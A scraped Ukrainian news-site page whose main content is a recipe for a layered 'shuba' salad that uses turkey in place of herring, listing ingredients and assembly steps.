<p class="subtitle"><strong>Оселедець під шубою у більшості асоціюється з новорічно-святковим періодом. А оскільки до цього сезону потрібно ще трішки почекати, пропонуємо поекспериментувати та замінити в салаті основний інгредієнт. Запевняємо, вийде також смачно.</strong></p>
<style>
    @media (max-width: 640px) {
        #mobileBrandingPlace {
            padding-bottom: 56.21%;
            z-index: 9;
            margin: 10px 0;
            order: -2;
        }
        #mobileBranding {
            margin: 0 !important;
        }
    }
</style>
<div class="mobileBrandingPlace" id="mobileBrandingPlace"></div>
<body><p>Так, оселедець сміливо можна замінити індичкою, і салат засмакує абсолютно по-новому. Це м'ясо досить м'яке і в міру жирне. А ще воно ідеально поєднується з овочами. Оригінальний рецепт з'явився на сторінці ua.zozh в <a rel="nofollow" href="https://www.instagram.com/p/CimqtesDj_R/" target="_blank">Instagram</a>.</p>
<p class="read-also">І ще: <a href="https://maximum.fm/ektor-himenes-bravo-prigotuvav-garyachij-sendvich-recept-perekusu-vid-shef-kuharya_n206091" target="_blank">Ектор Хіменес-Браво приготував гарячий сендвіч: рецепт перекусу від шеф-кухаря</a></p>
<h4 style="text-align: center;">Як приготувати індичку під шубою: покроковий рецепт</h4>
<p><strong>Інгредієнти:</strong></p>
<ul>
<li>філе індички – 200 грамів;</li>
<li>картопля відварена – 2-3 штуки;</li>
<li>яйця – 2 штуки;</li>
<li>буряк – 2 середніх;</li>
 <li>морква – 2 середніх;</li>
<li>мариновані огірки – 2-3 штуки;</li>
<li>чорнослив – 20 грамів (за бажанням);</li>
<li>майонез – на ваш смак.</li>
</ul>
<p><strong>Спосіб приготування:</strong></p>
<ol>
<li>Відваріть картоплю, буряк, моркву та яйця.</li>
<li>Тим часом відваріть також або обсмажте індичку.</li>
<li>Овочі почистіть та натріть на грубій тертці, а м'ясо поріжте невеликими шматочками</li>
<li>Огірок маринований та чорнослив наріжте дрібно.</li>
<li>Викладайте салат шарами: картопля – морква – індичка – огірки – яйце – буряк із чорносливом. Між кожним шаром не забудьте змастити майонезом, а зверху – посолити.</li>
</ol>
<p><strong>Смачного!</strong></p>
<div class="news-photo">
<span class="lazyload-holder" style="padding-bottom: 125.06666666667%;">
<img width="640" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/09/6329b21a1937c752112072.jpg?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=53" data-sizes="auto" class="lazyload " style="" alt="Альтернативний рецепт &#039;шуби&#039;: що додати до салату замість оселедця - фото 513364">
<noscript>
        <img src="/uploads/media_news/2022/09/6329b21a1937c752112072.jpg?w=640&amp;il&amp;q=60&amp;output=jpg&amp;v=53"  alt="Альтернативний рецепт &#039;шуби&#039;: що додати до салату замість оселедця - фото 513364">
    </noscript>
</span></div>
<p class="read-also">Читайте також: <a href="https://maximum.fm/shcho-prigotuvati-z-garbuza-recept-osinnogo-krem-supu-vid-zirkovogo-kulinara_n206051" target="_blank">Що приготувати з гарбуза: рецепт осіннього крем-супу від зіркового кулінара</a></p><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"74e295d4194a82b4","token":"cbfb020a8bb54073809b60aff8bcd962","version":"2022.8.1","si":100}' crossorigin="anonymous"></script>
</body>
<div class="add-scrollNews"></div>
<div class="hide-mobile-adv"></div>
<div class="follow-us-under-news">Читай максимум цікавих новин у
<a href="https://invite.viber.com/?g2=AQAKD4%2BB%2BNY530jWU5ccjyV3AZcJqO4yEMBH%2BHIFofGeS1%2F9tkreWHPw%2BiWAo2Hf&lang=uk" target="_blank">Viber</a>
</div>
<ul class="tags">
<li>Теги:</li>
<li>
<a class="ajaxLink" data-url="/populyarne_t23834" title="" href="/populyarne_t23834">Популярне</a>
</li>
<li>
<a class="ajaxLink" data-url="/recepti_t23098" title="" href="/recepti_t23098">Рецепти</a>
</li>
<li>
<a class="ajaxLink" data-url="/yizha_t23025" title="" href="/yizha_t23025">Їжа</a>
</li>
</ul>
</div>
</div>
<hr>
<script>
        if (adCore.isSmallerThan(640)) {
            $('.fucked-desktop-adv').remove();
            adCore.defineDfpSlot({
                'name': '/56301415/maximum_promoArticle',
                'sizes': [1, 1],
                'id': 'div-gpt-ad-1513328055277-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function (e) {
                    dfpAdSlots['promoArticle'] = e.slot;
                    if (!e.isEmpty) {
                        document.getElementById('newsListPromoArticle').style.display = 'block';
                    } else {
                        console.log('Empty Promo')
                    }
                }
            });
        }
</script>
<div id="newsListPromoArticle" style="display: none" class="fucked-mobile-adv">
<div id='div-gpt-ad-1513328055277-0'>
<script type='text/javascript'>
            if (adCore.isSmallerThan(640)) {
                googletag.cmd.push(function () {
                    googletag.display('div-gpt-ad-1513328055277-0');
                });
            }
        </script>
</div>
</div>
<div class="partner-recomendation">
<hr>
<div class="title">
<span class="replace-h3">пропозиції партнерів</span>
</div>
</div>

<script>
    function initPartnerRecommendation (){
        var node = document.createElement("div");
        node.style.textAlign = '-webkit-center';
        node.innerHTML = "<div id='div-gpt-ad-1619016064260-0'></div><div id='div-gpt-ad-1619016119630-0'></div>";
        var summary = document.querySelector(".partner-recomendation");
        summary.after(node);
        var slotId;
        var slotSize;
        var wrapperId;
        if (window.innerWidth < 640) {
            slotId = '/56301415/maximum_mobile_afterNews';
            slotSize = [300, 250];
            wrapperId = 'div-gpt-ad-1619016064260-0';
        } else {
            slotId = '/56301415/maximum_afterNews';
            slotSize = [[1, 1], [600, 300]];
            wrapperId = 'div-gpt-ad-1619016119630-0';
        }
        adCore.defineDfpSlot({
            'name': slotId,
            'sizes': slotSize,
            'id': wrapperId,
            'targeting': [
                ['pageType', adCore.getPageName()],
                                ['newsId', '206143'],
                ['tagId', 'Популярне,Рецепти,Їжа,Фото,Новини'],
                            ],
            'callback': function (e) {
                if(e.isEmpty){
                    console.log('EMPTY DFP afterNews')
                    var dfpDiv = document.getElementById(wrapperId);
                    summary.style.display = 'none';
                    dfpDiv.style.display = 'none';
                }
            }
        });

        var wrapperNode = document.getElementById(wrapperId);
        if (window.innerWidth < 640) {
                googletag.cmd.push(function () {
                    googletag.display(wrapperId);
                });
            wrapperNode.setAttribute('style', 'width: 300px; height: 250px;');
            summary.style.textAlign = '-webkit-center';
        } else {
                googletag.cmd.push(function () {
                    googletag.display(wrapperId);
                });
        }
    }

observer(".follow-us-under-news", initPartnerRecommendation)

</script>

</div>
<div id="load-news-container"></div>
</div>
<div class="columns show-for-large large-4">
<div id="radio24_300x100" style="display: none">
<script>
        if(adCore.isLargerThan(1024)) {
            adCore.defineDfpSlot({
                'name': '/113579682/radio24_300x100',
                'sizes': [300, 100],
                'id': 'div-gpt-ad-1473750613519-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function(e) {
                    if(!e.isEmpty){
                        document.getElementById('radio24_300x100').style.display = 'block';
                    } else {
                        console.log('Empty radio24_300x100')
                    }
                }
            });
        }
</script>
<div class="mobile-300-reklama">
<div id='div-gpt-ad-1473750613519-0'>
<script type='text/javascript'>
                if (adCore.isLargerThan(1024)) {
                    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1473750613519-0'); });
                }
        </script>
</div>
</div> </div>
<script>
    if (adCore.isLargerThan(1024)) {
        $('.fucked-mobile-adv').remove();
        adCore.defineDfpSlot({
            'name': '/56301415/maximum_right_column_informer',
            'sizes': [300, 250],
            'id': 'div-gpt-ad-1659515946920-0',
            'targeting': adCore.targeting.getAll(),
            'refreshEventName': 'historyChange',
            'callback': function (e) {
                dfpAdSlots['promoArticle'] = e.slot;
                if (!e.isEmpty) {
                    document.getElementById('newsListPromoArticle').style.display = 'block';
                } else {
                    console.log("EMPTY DESKTOP rightColumnInformer")
                }
            }
        });
    }
</script>
<div id="newsListPromoArticle" style="display: none" class="fucked-desktop-adv">
<div id='div-gpt-ad-1659515946920-0'>
<script type='text/javascript'>
            if (adCore.isLargerThan(1024)) {
                googletag.cmd.push(function () {
                    googletag.display('div-gpt-ad-1659515946920-0');
                });
            }
        </script>
</div>
</div>
<div style="margin-top: 20px;" id="radio24_300x250_top">

<div id="M378454ScriptRootC662077">
<div id="M378454PreloadC662077"></div>
<script>
            var D = new Date(), d = document, b = 'body', ce = 'createElement', ac = 'appendChild', st = 'style',
                ds = 'display', n = 'none', gi = 'getElementById', lp = d.location.protocol,
                wp = lp.indexOf('http') == 0 ? lp : 'https:';
            var i = d[ce]('iframe');
            i[st][ds] = n;
            d[gi]("M378454ScriptRootC662077")[ac](i);
            try {
                var iw = i.contentWindow.document;
                iw.open();
                iw.writeln("<ht" + "ml><bo" + "dy></bo" + "dy></ht" + "ml>");
                iw.close();
                var c = iw[b];
            } catch (e) {
                var iw = d;
                var c = d[gi]("M378454ScriptRootC662077");
            }
            var dv = iw[ce]('div');
            dv.id = "MG_ID";
            dv[st][ds] = n;
            dv.innerHTML = 662077;
            c[ac](dv);
            var s = iw[ce]('script');
            s.async = 'async';
            s.defer = 'defer';
            s.charset = 'utf-8';
            s.src = wp + "//jsc.marketgid.com/1/m/1.maximum.fm.662077.js?t=" + D.getYear() + D.getMonth() + D.getUTCDate() + D.getUTCHours();
            c[ac](s);
    </script>
</div>  </div>
<div class="news-list-wrapper" id="news-list-wrapper" data-main="0">
<script data-cfasync="false">
    if (window.innerWidth < 640) {
        const removeElements = (elms) => elms.forEach(el => el.remove());
        removeElements(document.querySelectorAll('.news-list-wrapper'));
    }
</script>
<span class="replace-h3"><a class="ajaxLink" data-url="/novini_t2" title="novina" href="/novini_t2">Новини</a></span>
<ul class="tabs sort-list " data-tabs id="news-list-tabs">
<li data-height-set="false" id="top-list-li" class="tabs-title"><a href="#top-list">Головні</a></li>
<li class="tabs-title is-active"><a href="#last-list" aria-selected="true">Останні</a></li>
</ul>
<div class="tabs-content" data-tabs-content="news-list-tabs">
<div class="tabs-panel is-active" id="last-list">
<button id="last-news-back-less-btn" class="border-button scroll-news-list more-news revers hide-button">Попередні новини
</button>
<div class="last-news-list-wrapper overflow-wrapper">
<ul data-position="0" class="news-list news-list-last-ul" id="ph" style="top:0">
<li data-published-date="2022-09-21 13:50:00" title="" class="   ">
<a target="_self" data-url="/yak-zahistitis-vid-radioaktivnogo-urazhennya_n202188" class="ajaxLink" href="/yak-zahistitis-vid-radioaktivnogo-urazhennya_n202188">
<div class="time">13:50</div>
<div class="news-title">
Як захиститись від радіоактивного ураження: прості правила
</div>
</a>
</li>
<li data-published-date="2022-09-21 12:32:45" title="" class="  photo important  ">
<a target="_self" data-url="/programa-utilizaciyi-rosiyan-podolyak-i-danilov-vismiyali-ogoloshennya-mobilizaciyi-v-rf_n206150" class="ajaxLink" href="/programa-utilizaciyi-rosiyan-podolyak-i-danilov-vismiyali-ogoloshennya-mobilizaciyi-v-rf_n206150">
<div class="time">12:32</div>
<div class="news-title">
&quot;Програма утилізації росіян&quot;: Подоляк і Данілов висміяли оголошення мобілізації в рф
</div>
</a>
</li>

<li data-published-date="2022-09-21 11:41:00" title="" class="  photo with-photo  ">
<a target="_self" data-url="/u-kozhnogo-ye-ulyublena-nezvichajni-ta-divni-chashki-z-domivok-po-vsomu-svitu_n205745" class="ajaxLink" href="/u-kozhnogo-ye-ulyublena-nezvichajni-ta-divni-chashki-z-domivok-po-vsomu-svitu_n205745">
<div class="time">11:41</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/08/62ffc0218900f403816616.jpg?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=53" data-sizes="auto" class="lazyload " style="" alt="Найоригінальніші горнята з мережі">
<noscript>
        <img src="/uploads/media_news/2022/08/62ffc0218900f403816616.jpg?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=53"  alt="Найоригінальніші горнята з мережі">
    </noscript>
</span>
У кожного є улюблена: незвичайні та дивні чашки з домівок по всьому світу
</div>
</a>
</li>
<li data-published-date="2022-09-21 10:52:50" title="" class="  important  ">
<a target="_self" data-url="/koronavirus-v-ukrayini-skilki-hvorih-na-covid-19-zafiksovano-za-12--18-veresnya_n206149" class="ajaxLink" href="/koronavirus-v-ukrayini-skilki-hvorih-na-covid-19-zafiksovano-za-12--18-veresnya_n206149">
<div class="time">10:52</div>
<div class="news-title">
Коронавірус в Україні: скільки хворих на COVID-19 зафіксовано за 12 – 18 вересня
</div>
</a>
</li>
<li data-published-date="2022-09-21 09:33:00" title="" class="  important  ">
<a target="_self" data-url="/den-angela-mariyi-znachennya-imeni-ta-harakter-jogo-vlasnic_n170487" class="ajaxLink" href="/den-angela-mariyi-znachennya-imeni-ta-harakter-jogo-vlasnic_n170487">
<div class="time">09:33</div>
<div class="news-title">
День ангела Марії 2022: значення імені та характер його власниць
</div>
</a>
</li>
<li data-published-date="" title="" class="with-large-photo  video important  ">
<a target="_self" data-url="/ukrayinski-patriotichni-pisni-plejlist-yakij-pidijmaye-duh_n202423" class="ajaxLink" href="/ukrayinski-patriotichni-pisni-plejlist-yakij-pidijmaye-duh_n202423">
<div class="time"></div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="169" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/03/6230b8ac93e32907817273.png?w=300&amp;h=169&amp;il&amp;q=60&amp;output=jpg&amp;v=53" data-sizes="auto" class="lazyload " style="" alt="Українська патріотична музика">
<noscript>
        <img src="/uploads/media_news/2022/03/6230b8ac93e32907817273.png?w=300&amp;h=169&amp;il&amp;q=60&amp;output=jpg&amp;v=53"  alt="Українська патріотична музика">
    </noscript>
</span>
Українські патріотичні пісні: плейлист, який підіймає дух
</div>
</a>
</li>
<li data-published-date="2022-09-21 08:47:00" title="" class="   ">
<a target="_self" data-url="/chi-potribno-robiti-shcheplennya-vid-skazu-yakshcho-vkusila-domashnya-tvarina-vidpovid-medikiv_n205103" class="ajaxLink" href="/chi-potribno-robiti-shcheplennya-vid-skazu-yakshcho-vkusila-domashnya-tvarina-vidpovid-medikiv_n205103">
<div class="time">08:47</div>
<div class="news-title">
Чи потрібно робити щеплення від сказу, якщо вкусила домашня тварина: відповідь медиків
</div>
</a>
</li>
<li class="month">
20 вересня
</li>
<li data-published-date="2022-09-20 20:50:00" title="" class="  photo  ">
<a target="_self" data-url="/top-5-najkrasivishih-dorig-svitu-avtomobilni-marshruti-vid-yakih-perehoplyuye-podih_n194289" class="ajaxLink" href="/top-5-najkrasivishih-dorig-svitu-avtomobilni-marshruti-vid-yakih-perehoplyuye-podih_n194289">
<div class="time">20:50</div>
<div class="news-title">
ТОП 5 найкрасивіших доріг світу: автомобільні маршрути, від яких перехоплює подих
</div>
</a>
</li>
<li data-published-date="2022-09-20 20:18:00" title="" class="  important  ">
<a target="_self" data-url="/21-veresnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti-_n206148" class="ajaxLink" href="/21-veresnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti-_n206148">
<div class="time">20:18</div>
<div class="news-title">
21 вересня 2022 – яке сьогодні свято: традиції, заборони і прикмети
</div>
</a>
</li>
<li data-published-date="2022-09-20 19:45:00" title="" class="  with-photo  ">
<a target="_self" data-url="/yak-volonteram-zberigati-svoye-zdorovya-poradi-vid-cgz_n203189" class="ajaxLink" href="/yak-volonteram-zberigati-svoye-zdorovya-poradi-vid-cgz_n203189">
 <div class="time">19:45</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/04/624dcd73dc01e275294944.jpg?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=53" data-sizes="auto" class="lazyload " style="" alt="Ці поради допоможуть зберігати здоров&#039;я волонтерам">
<noscript>
        <img src="/uploads/media_news/2022/04/624dcd73dc01e275294944.jpg?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=53"  alt="Ці поради допоможуть зберігати здоров&#039;я волонтерам">
    </noscript>
</span>
Як волонтерам зберігати своє здоров&#039;я: поради від ЦГЗ
</div>
</a>
</li>
<li data-published-date="2022-09-20 19:11:00" title="" class="   ">
<a target="_self" data-url="/naukovci-pidrahuvali-skilki-murah-prozhivaye-na-zemli-ta-viznachili-yihnyu-zagalnu-vagu_n206147" class="ajaxLink" href="/naukovci-pidrahuvali-skilki-murah-prozhivaye-na-zemli-ta-viznachili-yihnyu-zagalnu-vagu_n206147">
<div class="time">19:11</div>
<div class="news-title">
Науковці підрахували, скільки мурах проживає на Землі та визначили їхню загальну вагу
</div>
</a>
</li>
<li data-published-date="2022-09-20 18:34:00" title="" class="  video important  ">
<a target="_self" data-url="/ne-mcdonalds-yedinim-yak-prigotuvati-sokovitij-burger-vdoma--prostij-recept-u-video_n206146" class="ajaxLink" href="/ne-mcdonalds-yedinim-yak-prigotuvati-sokovitij-burger-vdoma--prostij-recept-u-video_n206146">
<div class="time">18:34</div>
<div class="news-title">
Не McDonald&#039;s єдиним: як приготувати соковитий бургер вдома – простий рецепт у відео
</div>
</a>
</li>
<li data-published-date="2022-09-20 17:55:00" title="" class="  photo  ">
<a target="_self" data-url="/teleskop-james-webb-upershe-sfotografuvav-mars_n206144" class="ajaxLink" href="/teleskop-james-webb-upershe-sfotografuvav-mars_n206144">
<div class="time">17:55</div>
<div class="news-title">
Телескоп James Webb уперше сфотографував Марс
</div>
</a>
</li>
<li data-published-date="2022-09-20 17:27:00" title="" class="  video  ">
<a target="_self" data-url="/odin-iz-najdorozhchih-u-sviti-superkariv-rozbili-v-dtp-na-rivnomu-misci-video-momentu-avari_n205955" class="ajaxLink" href="/odin-iz-najdorozhchih-u-sviti-superkariv-rozbili-v-dtp-na-rivnomu-misci-video-momentu-avari_n205955">
<div class="time">17:27</div>
<div class="news-title">
Один із найдорожчих у світі суперкарів розбили в ДТП на рівному місці: відео моменту аварі
</div>
</a>
</li>
<li data-published-date="" title="" class="with-large-photo  photo video  ">
<a target="_self" data-url="/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167" class="ajaxLink" href="/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167">
<div class="time"></div>
<div class="news-title">

<span class="lazyload-holder">
<img width="300" height="169" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2019/03/5c8a3a3175fc8135803913.png?w=300&amp;h=169&amp;il&amp;q=60&amp;output=jpg&amp;v=53" data-sizes="auto" class="lazyload " style="" alt="З днем народження!">
<noscript>
        <img src="/uploads/media_news/2019/03/5c8a3a3175fc8135803913.png?w=300&amp;h=169&amp;il&amp;q=60&amp;output=jpg&amp;v=53"  alt="З днем народження!">
    </noscript>
</span>
З Днем народження: ТОП 75 привітань у віршах, прозі та смс українською
</div>
</a>
</li>
<li data-published-date="2022-09-20 16:52:00" title="" class="  photo  ">
<a target="_self" data-url="/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143" class="ajaxLink" href="/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143">
<div class="time">16:52</div>
<div class="news-title">
Альтернативний рецепт &quot;шуби&quot;: що додати до салату замість оселедця
</div>
</a>
</li>
<li data-published-date="2022-09-20 16:20:00" title="" class="  photo with-photo  ">
<a target="_self" data-url="/kompaniya-ulefone-predstavila-power-armor-16-pro--najguchnishij-smartfon-v-istoriyi_n206142" class="ajaxLink" href="/kompaniya-ulefone-predstavila-power-armor-16-pro--najguchnishij-smartfon-v-istoriyi_n206142">
<div class="time">16:20</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/09/6329a81054e27721714266.png?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=53" data-sizes="auto" class="lazyload " style="" alt="">
<noscript>
        <img src="/uploads/media_news/2022/09/6329a81054e27721714266.png?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=53"  alt="">
    </noscript>
</span>
Компанія Ulefone представила Power Armor 16 Pro – найгучніший смартфон в історії
</div>
</a>
</li>
<li data-published-date="2022-09-20 15:45:00" title="" class="  important  ">
<a target="_self" data-url="/yak-keruvati-svoyim-gnivom-shchob-ne-zipsuvati-stosunki-z-otochennyam-diyevi-poradi_n206145" class="ajaxLink" href="/yak-keruvati-svoyim-gnivom-shchob-ne-zipsuvati-stosunki-z-otochennyam-diyevi-poradi_n206145">
<div class="time">15:45</div>
<div class="news-title">
Як керувати своїм гнівом, щоб не зіпсувати стосунки з оточенням: дієві поради
</div>
</a>
</li>
<li data-published-date="2022-09-20 15:23:00" title="" class="  video  ">
<a target="_self" data-url="/naomi-kempbell-postala-u-novij-reklami-hm-atmosferne-video_n206140" class="ajaxLink" href="/naomi-kempbell-postala-u-novij-reklami-hm-atmosferne-video_n206140">
<div class="time">15:23</div>
<div class="news-title">
Наомі Кемпбелл постала у новій рекламі H&amp;M: атмосферне відео
</div>
</a>
</li>
<li data-published-date="2022-09-20 14:50:00" title="" class="   ">
<a target="_self" data-url="/pogoda-v-ukrayini-21-veresnya-u-yakih-oblastyah-bude-najholodnishe_n206141" class="ajaxLink" href="/pogoda-v-ukrayini-21-veresnya-u-yakih-oblastyah-bude-najholodnishe_n206141">
<div class="time">14:50</div>
<div class="news-title">
Погода в Україні 21 вересня: у яких областях буде найхолодніше
</div>
</a>
</li>
<li data-published-date="2022-09-20 14:22:00" title="" class="  photo  ">
<a target="_self" data-url="/dostavka-mcdonalds-na-pravij-bereg-kiyani-pochali-pereprodavati-fastfud-na-olx_n206139" class="ajaxLink" href="/dostavka-mcdonalds-na-pravij-bereg-kiyani-pochali-pereprodavati-fastfud-na-olx_n206139">
<div class="time">14:22</div>
<div class="news-title">
Доставка McDonald&#039;s на Правий берег: кияни почали перепродавати фастфуд через OLX
</div>
</a>
</li>
<li data-published-date="2022-09-20 13:51:00" title="" class="  photo  ">
<a target="_self" data-url="/pereshivala-svoyi-sukni-ta-nadihala-tvoriti-zlata-ognyevich-pokazala-teple-foto-z-mamoyu_n206137" class="ajaxLink" href="/pereshivala-svoyi-sukni-ta-nadihala-tvoriti-zlata-ognyevich-pokazala-teple-foto-z-mamoyu_n206137">
<div class="time">13:51</div>
<div class="news-title">
&quot;Перешивала свої сукні та надихала творити&quot;: Злата Огнєвіч показала тепле фото з мамою
</div>
</a>
</li>
<li data-published-date="2022-09-20 13:21:00" title="" class="  with-photo video  ">
<a target="_self" data-url="/cikavi-seriali-veresnya-2022-top-9-novinok-yaki-ne-mozhna-propustiti_n205883" class="ajaxLink" href="/cikavi-seriali-veresnya-2022-top-9-novinok-yaki-ne-mozhna-propustiti_n205883">
<div class="time">13:21</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/09/6318cb5a1d837033032049.png?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=53" data-sizes="auto" class="lazyload " style="" alt="Нові серіали вересня 2022">
<noscript>
        <img src="/uploads/media_news/2022/09/6318cb5a1d837033032049.png?w=300&amp;h=100&amp;il&amp;q=60&amp;output=jpg&amp;v=53"  alt="Нові серіали вересня 2022">
    </noscript>
</span>
Цікаві серіали вересня 2022: ТОП 9 новинок, які не можна пропустити
</div>
</a>
</li>
<li data-published-date="2022-09-20 12:54:00" title="" class="  video  ">
<a target="_self" data-url="/ne-dratujte-bogiv-vijni-ukrayinski-bijci-pokazali-yak-nishchat-okupantiv--video_n206136" class="ajaxLink" href="/ne-dratujte-bogiv-vijni-ukrayinski-bijci-pokazali-yak-nishchat-okupantiv--video_n206136">
<div class="time">12:54</div>
<div class="news-title">
Не дратуйте &quot;богів війни&quot;: українські бійці показали, як нищать окупантів – відео
</div>
</a>
</li>
<li data-published-date="2022-09-20 12:29:00" title="" class="  last ">
<a target="_self" data-url="/yak-bezpechno-koristuvatisya-gromadskimi-bezplatnimi-merezhami-wi-fi-prosti-poradi_n205505" class="ajaxLink" href="/yak-bezpechno-koristuvatisya-gromadskimi-bezplatnimi-merezhami-wi-fi-prosti-poradi_n205505">
<div class="time">12:29</div>
 <div class="news-title">
Як безпечно користуватися громадськими безплатними мережами Wi-Fi: прості поради
</div>
</a>
</li>
</ul>
</div>
<button data-limit="25" class="border-button scroll-news-list more-news last">Більше новин
</button>
</div>
<div class="tabs-panel" id="top-list">
<button data-scrolled-count="0" data-scrolled-li-index="0" id="important-news-back-less-btn" class="border-button scroll-news-list more-news revers hide-button">Попередні новини
</button>
<div class="important-news-list-wrapper overflow-wrapper">
<ul data-position="0" class="news-list-important-ul news-list" style="top:0">
<li data-published-date="2022-09-21 12:32:45" class=" photo   ">
<a data-url="/programa-utilizaciyi-rosiyan-podolyak-i-danilov-vismiyali-ogoloshennya-mobilizaciyi-v-rf_n206150" title="" class="ajaxLink" target="_self" href="/programa-utilizaciyi-rosiyan-podolyak-i-danilov-vismiyali-ogoloshennya-mobilizaciyi-v-rf_n206150">
<div class="time">12:32</div>
<div class="news-title">
&quot;Програма утилізації росіян&quot;: Подоляк і Данілов висміяли оголошення мобілізації в рф
</div>
</a>
</li>
<li data-published-date="2022-09-21 10:52:50" class="   ">
<a data-url="/koronavirus-v-ukrayini-skilki-hvorih-na-covid-19-zafiksovano-za-12--18-veresnya_n206149" title="" class="ajaxLink" target="_self" href="/koronavirus-v-ukrayini-skilki-hvorih-na-covid-19-zafiksovano-za-12--18-veresnya_n206149">
<div class="time">10:52</div>
<div class="news-title">
Коронавірус в Україні: скільки хворих на COVID-19 зафіксовано за 12 – 18 вересня
</div>
</a>
</li>
<li class="month">
20 вересня
</li>

<li data-published-date="2022-09-20 20:18:00" class="   ">
<a data-url="/21-veresnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti-_n206148" title="" class="ajaxLink" target="_self" href="/21-veresnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti-_n206148">
<div class="time">20:18</div>
<div class="news-title">
21 вересня 2022 – яке сьогодні свято: традиції, заборони і прикмети
</div>
</a>
</li>
<li data-published-date="2022-09-20 18:34:00" class=" video   ">
<a data-url="/ne-mcdonalds-yedinim-yak-prigotuvati-sokovitij-burger-vdoma--prostij-recept-u-video_n206146" title="" class="ajaxLink" target="_self" href="/ne-mcdonalds-yedinim-yak-prigotuvati-sokovitij-burger-vdoma--prostij-recept-u-video_n206146">
<div class="time">18:34</div>
<div class="news-title">
Не McDonald&#039;s єдиним: як приготувати соковитий бургер вдома – простий рецепт у відео
</div>
</a>
</li>
<li data-published-date="2022-09-20 15:45:00" class="   ">
<a data-url="/yak-keruvati-svoyim-gnivom-shchob-ne-zipsuvati-stosunki-z-otochennyam-diyevi-poradi_n206145" title="" class="ajaxLink" target="_self" href="/yak-keruvati-svoyim-gnivom-shchob-ne-zipsuvati-stosunki-z-otochennyam-diyevi-poradi_n206145">
<div class="time">15:45</div>
<div class="news-title">
Як керувати своїм гнівом, щоб не зіпсувати стосунки з оточенням: дієві поради
</div>
</a>
</li>

<li data-published-date="2022-09-20 11:30:52" class="   ">
<a data-url="/vispa-mavp-v-ukrayini-zafiksuvali-drugij-vipadok_n206134" title="" class="ajaxLink" target="_self" href="/vispa-mavp-v-ukrayini-zafiksuvali-drugij-vipadok_n206134">
<div class="time">11:30</div>
<div class="news-title">
Віспа мавп: в Україні зафіксували другий випадок
</div>
</a>
</li>
<li class="month">
19 вересня
</li>
<li data-published-date="2022-09-19 18:30:00" class=" photo   ">
<a data-url="/u-merezhu-zlili-onovlene-menyu-mcdonalds-usi-stravi-stanut-dorozhchimi_n206129" title="" class="ajaxLink" target="_self" href="/u-merezhu-zlili-onovlene-menyu-mcdonalds-usi-stravi-stanut-dorozhchimi_n206129">
<div class="time">18:30</div>
<div class="news-title">
У мережу злили оновлене меню McDonald&#039;s: усі страви стануть дорожчими
</div>
</a>
</li>
<li data-published-date="2022-09-19 15:52:00" class=" video   ">
<a data-url="/horobri-mista-alyona-alyona-vipustila-potuzhnij-trek-pro-mariupol_n206128" title="" class="ajaxLink" target="_self" href="/horobri-mista-alyona-alyona-vipustila-potuzhnij-trek-pro-mariupol_n206128">
<div class="time">15:52</div>
<div class="news-title">
Хоробрі міста: Alyona Alyona випустила потужний трек про Маріуполь
</div>
</a>
</li>

<li data-published-date="2022-09-19 11:25:20" class="   ">
<a data-url="/mcdonalds-vidchinyayetsya-v-ukrayini-koli-ta-yaki-zakladi-zapracyuyut_n206119" title="" class="ajaxLink" target="_self" href="/mcdonalds-vidchinyayetsya-v-ukrayini-koli-ta-yaki-zakladi-zapracyuyut_n206119">
<div class="time">11:25</div>
<div class="news-title">
McDonald&#039;s відчиняється в Україні: коли та які заклади запрацюють
</div>
</a>
</li>
<li class="month">
18 вересня
</li>
<li data-published-date="2022-09-18 17:43:00" class="   ">
<a data-url="/goroskop-na-cej-tizhden-19-25-veresnya-2022-prognoz-dlya-vsih-znakiv-zodiaku_n206105" title="" class="ajaxLink" target="_self" href="/goroskop-na-cej-tizhden-19-25-veresnya-2022-prognoz-dlya-vsih-znakiv-zodiaku_n206105">
<div class="time">17:43</div>
<div class="news-title">
Гороскоп на цей тиждень 19 – 25 вересня 2022: прогноз для всіх знаків Зодіаку
</div>
</a>
</li>
<li data-published-date="2022-09-18 11:51:00" class="   ">
